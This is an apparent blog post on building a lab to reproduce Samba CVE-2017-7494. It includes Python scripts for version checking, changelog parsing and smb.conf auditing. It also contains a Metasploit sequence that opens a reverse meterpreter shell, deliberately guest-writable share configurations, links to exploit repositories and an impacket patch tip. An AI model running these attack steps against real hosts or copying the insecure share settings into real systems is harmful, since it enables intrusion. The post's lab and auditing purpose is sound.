Setting up a vulnerability test lab

TL;DR - Quickly set up a lab for reproducing and verifying a vulnerability. This post uses the Samba remote code execution vulnerability (CVE-2017-7494) as the worked example.
1. Overview of Samba CVE-2017-7494
On 24 May 2017 Samba released version 4.6.4, which among other fixes closed a critical remote code execution vulnerability, CVE-2017-7494. All Samba versions from 3.5.0 up to (but not including) 4.6.4, 4.5.10 and 4.4.14 are affected.
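Before building the lab it helps to be able to tell, from a version string alone, whether a host is in the affected range above. The following checker is an added example written for this post, not code from the Samba project or the original article; it encodes the range stated in the advisory (affected from 3.5.0, fixed in 4.6.4 / 4.5.10 / 4.4.14) and accepts the kind of strings you get from `smbd --version`, `dpkg -l` or `rpm -q`. It only judges the upstream version: distributions backport fixes without bumping it, so a "vulnerable" result for a 4.3.x or 3.6.x package still has to be confirmed against the package changelog (section 6).

```python
import re
from typing import Tuple

Version = Tuple[int, int, int]

# Range stated in the advisory: affected from 3.5.0 onward; first fixed
# releases per branch are 4.6.4, 4.5.10 and 4.4.14.
FIRST_AFFECTED: Version = (3, 5, 0)
FIXED_IN_BRANCH = {(4, 6): (4, 6, 4), (4, 5): (4, 5, 10), (4, 4): (4, 4, 14)}
# Branches older than 4.4 (4.3.x, 3.6.x, ...) received no upstream fix; any
# fix there comes from a distribution backport and must be checked via the
# package changelog instead.
OLDEST_FIXED_BRANCH = (4, 4)


def parse_version(text: str) -> Version:
    """Extract the first X.Y.Z upstream version from a version string.

    Works for `smbd --version` ("Version 4.3.11-Ubuntu"), Debian package
    versions ("2:4.3.11+dfsg-0ubuntu0.16.04.6") and RPM NVRs
    ("samba-3.6.23-41.el6").
    """
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no X.Y.Z version found in {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def upstream_vulnerable(text: str) -> bool:
    """True if the upstream version lies in the affected range."""
    v = parse_version(text)
    if v < FIRST_AFFECTED:
        return False
    fixed = FIXED_IN_BRANCH.get(v[:2])
    if fixed is not None:
        return v < fixed
    # Branches released after the fix (4.7+) are clean; older ones are not.
    return v[:2] < OLDEST_FIXED_BRANCH


if __name__ == "__main__":
    # Constructed sample strings matching the versions used in this post.
    for s in ("2:4.3.11+dfsg-0ubuntu0.16.04.6", "samba-3.6.23-41.el6",
              "Version 4.6.4", "4.5.9", "4.7.0"):
        print(f"{s:40} vulnerable upstream: {upstream_vulnerable(s)}")
```

Both packages used later in this post (the Ubuntu 2:4.3.11 build and the CentOS 3.6.23 build) fall in the affected range, which is why they are the ones installed in the lab.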
2. Lab environment
Attacker operating system:
Kali Linux 2017.1 (kali-rolling)

Target operating system:
Ubuntu 16.04.2 LTS

Vulnerable package version:
samba 2:4.3.11+dfsg-0ubuntu0.16.04.6

Vulnerable package download locations:
https://launchpad.net/~ubuntu-security-proposed/+archive/ubuntu/ppa/+build/12371197
https://github.com/Zer0d0y/Samba-CVE-2017-7494/blob/master/Samba_CVE-2017-7494_pkgs.tar.gz
3. Samba configuration
# Samba configuration
vi /etc/samba/smb.conf
# Append the following to the end of the file
[public]
path = /share
public = yes
writable = yes
guest ok = yes

# Create the directory, set its ownership and restart the service
mkdir /share
chown nobody:nogroup /share/
/etc/init.d/smbd restart
4. Exploitation (Metasploit)
msfconsole
use exploit/linux/samba/is_known_pipename
set RHOST 192.168.8.95
show targets
set target 3
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.8.82
set LPORT 51000
show options
exploit
5. Installing older package versions (Ubuntu and CentOS) for vulnerability verification
# Ubuntu
Method 1: download from Launchpad
https://launchpad.net/ubuntu/<release codename>/+source/<package name>

Example: Ubuntu 16.04 xenial
https://launchpad.net/ubuntu/xenial/+source/samba
Pick the relevant version:
https://launchpad.net/ubuntu/+source/samba/2:4.3.11+dfsg-0ubuntu0.16.04.6
Pick the platform: Builds ---> amd64
https://launchpad.net/~ubuntu-security-proposed/+archive/ubuntu/ppa/+build/12371197
Download the required packages (list the installed samba packages first so you fetch the same set):
dpkg -l | grep samba | cut -d' ' -f3
wget xxx.deb

# CentOS
Method 1: list the versions yum can see
yum --showduplicates list samba

Method 2: fetch from the package archives
http://vault.centos.org/6.0/os/x86_64/Packages/
http://vault.centos.org/6.0/os/SRPMS/Packages/ or http://ftp.redhat.com/redhat/linux/enterprise/6Server/en/os/SRPMS/
http://rpm.pbone.net/
6. Checking which bugs (CVEs) a package version fixed
# Ubuntu
apt changelog samba

# CentOS
rpm -qa samba --changelog | head
yum install yum-plugin-changelog
yum changelog 1 samba | less
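Reading the changelog by eye works for one host; for a fleet you want the same question answered mechanically: does the installed package version, or any older entry beneath it, mention the CVE you care about? The following is an added example written for this post, not part of the original article or of any distribution tooling. It parses the Debian changelog format that `apt changelog samba` prints. The changelog text is a constructed sample: the ".7" version shown as carrying the fix is hypothetical, and CVE-0000-0000 is a placeholder for an unrelated earlier fix. The package version ".6" is the one installed in this lab.

```python
import re
from typing import List, Set, Tuple

# Constructed sample in Debian changelog format (what `apt changelog samba`
# prints). The ".7" fixing version is hypothetical and chosen to sit next to
# the package version used in this post; CVE-0000-0000 is a placeholder for
# an unrelated, earlier CVE.
SAMPLE_CHANGELOG = """\
samba (2:4.3.11+dfsg-0ubuntu0.16.04.7) xenial-security; urgency=medium

  * SECURITY UPDATE: remote code execution via writable share
    - debian/patches/CVE-2017-7494.patch: validate pipe names
    - CVE-2017-7494

 -- Maintainer <maintainer@example.invalid>  Wed, 24 May 2017 12:00:00 +0000

samba (2:4.3.11+dfsg-0ubuntu0.16.04.6) xenial-security; urgency=medium

  * SECURITY UPDATE: placeholder for an earlier fix
    - CVE-0000-0000

 -- Maintainer <maintainer@example.invalid>  Thu, 23 Mar 2017 12:00:00 +0000
"""

# Debian changelog entry header: "<source> (<version>) <distribution>; ..."
ENTRY_RE = re.compile(r"^(\S+) \(([^)]+)\) ", re.MULTILINE)
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_changelog(text: str) -> List[Tuple[str, Set[str]]]:
    """Split a Debian changelog into (version, {CVE ids}) pairs, newest first."""
    heads = list(ENTRY_RE.finditer(text))
    entries: List[Tuple[str, Set[str]]] = []
    for i, head in enumerate(heads):
        end = heads[i + 1].start() if i + 1 < len(heads) else len(text)
        body = text[head.end():end]
        entries.append((head.group(2), set(CVE_RE.findall(body))))
    return entries


def cve_fixed_in_installed(installed: str, changelog: str, cve: str) -> bool:
    """True if the installed package version, or any older version listed in
    the changelog, carries a fix for `cve`.

    Entries are newest-first, so everything from the installed version's entry
    to the end of the list is already contained in the installed package.
    """
    entries = parse_changelog(changelog)
    versions = [v for v, _ in entries]
    if installed not in versions:
        raise ValueError(f"version {installed!r} not found in changelog")
    start = versions.index(installed)
    return any(cve in cves for _, cves in entries[start:])


if __name__ == "__main__":
    for v in ("2:4.3.11+dfsg-0ubuntu0.16.04.6", "2:4.3.11+dfsg-0ubuntu0.16.04.7"):
        print(v, "fixes CVE-2017-7494:",
              cve_fixed_in_installed(v, SAMPLE_CHANGELOG, "CVE-2017-7494"))
```

Matching on the exact version string from `dpkg -l` avoids having to reimplement Debian version ordering (epochs, `~` suffixes); the trade-off is that a locally rebuilt package with a different version string is reported as unknown rather than guessed at. The same approach applies to `rpm --changelog` output with a different header regex.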
7. Samba CVE-2017-7494 on CentOS 6.5
# Install an old Samba version
yum --showduplicates list samba
yum remove samba-*
yum install samba-3.6.23-41.el6
setenforce 0

# Configure Samba
vi /etc/samba/smb.conf
[global]
workgroup = WORKGROUP
server string = 23 Samba Server Version %v
netbios name = jsamba
log file = /var/log/samba/log.%m

security = share
[public]
path = /share
public = yes
writable = yes
guest ok = yes

mkdir /share
chown nobody:nobody /share -R
/etc/init.d/smb restart
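Both lab configurations (section 3 and section 7) deliberately create the one precondition the vulnerability needs: a share that anonymous clients can write to. The CentOS variant additionally uses `security = share`, which is deprecated and makes every connection unauthenticated. The following audit script is an added example written for this post, not code from Samba or the original article. It parses an smb.conf (comments, case-insensitive parameter names, and the `writable`/`writeable`/`public` synonyms Samba accepts) and reports shares that are both writable and guest-accessible. The embedded configuration is a constructed sample: the `[global]` and `[public]` sections follow this post's CentOS config, and `[private]` is a hypothetical share added for contrast.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: the [global] and [public] sections from this post's
# CentOS lab config, plus a hypothetical [private] share for contrast.
SAMPLE_SMB_CONF = """\
[global]
workgroup = WORKGROUP
server string = Samba Server Version %v
log file = /var/log/samba/log.%m
security = share

[public]
path = /share
public = yes
writable = yes
guest ok = yes

[private]
path = /srv/private
read only = yes
guest ok = no
"""

SECTION_RE = re.compile(r"^\[(.+)\]$")


def _yes(value: str) -> bool:
    return value.strip().lower() in {"yes", "true", "1"}


def _canonical(key: str, value: str) -> Tuple[str, str]:
    """Map Samba synonyms onto one canonical parameter so that the usual
    last-one-wins rule also applies across synonyms."""
    if key in ("writable", "writeable", "write ok"):   # inverted synonyms of "read only"
        return "read only", "no" if _yes(value) else "yes"
    if key == "public":                               # synonym of "guest ok"
        return "guest ok", value
    return key, value


def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse smb.conf into {section: {parameter: value}}, honouring '#'/';'
    comments and case- and space-insensitive parameter names."""
    conf: Dict[str, Dict[str, str]] = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1).strip().lower()
            conf.setdefault(section, {})
            continue
        if section is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = _canonical(" ".join(key.split()).lower(), value.strip())
        conf[section][key] = value
    return conf


def audit_smb_conf(text: str) -> List[Tuple[str, str]]:
    """Return (section, finding) pairs for settings that allow unauthenticated
    file upload, the precondition CVE-2017-7494 relies on."""
    conf = parse_smb_conf(text)
    findings: List[Tuple[str, str]] = []
    if conf.get("global", {}).get("security", "").lower() == "share":
        findings.append(("global", "security = share: share-level security is "
                         "deprecated and treats every connection as unauthenticated"))
    for name, share in conf.items():
        if name in ("global", "printers"):
            continue
        writable = not _yes(share.get("read only", "yes"))   # Samba default: read only = yes
        guest = _yes(share.get("guest ok", "no"))            # Samba default: guest ok = no
        if writable and guest:
            findings.append((name, f"guest-writable share at {share.get('path', '?')}: "
                             "anonymous clients can upload arbitrary files"))
    return findings


if __name__ == "__main__":
    for section, finding in audit_smb_conf(SAMPLE_SMB_CONF):
        print(f"[{section}] {finding}")
```

Run against the lab config it reports `[global]` for `security = share` and `[public]` as guest-writable, while `[private]` is silent. On a production host the same two findings are the ones to remove, independently of whether the package itself has been patched.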
Appendix: Samba CVE-2017-7494 exploit tools

https://github.com/joxeankoret/CVE-2017-7494
https://github.com/CoreSecurity/impacket/blob/master/examples/sambaPipe.py
https://github.com/opsxcq/exploit-CVE-2017-7494
https://github.com/omri9741/cve-2017-7494

# Notes on CoreSecurity impacket
Edit the file impacket/smb3.py:
# line 925: comment out fileName = string.replace(fileName, '/', '\\')
# line 927: comment out fileName = ntpath.normpath(fileName)

Author: Zer0d0y
WeChat: Zer0d0y
Original post: https://www.zer0d0y.info/post/notes-on-bug-hunting-labs/
The copyright of this article belongs to the author. Reposting is welcome, but unless the author agrees otherwise this notice must be retained and a link to the original must be shown prominently on the page; otherwise the author reserves the right to pursue legal action.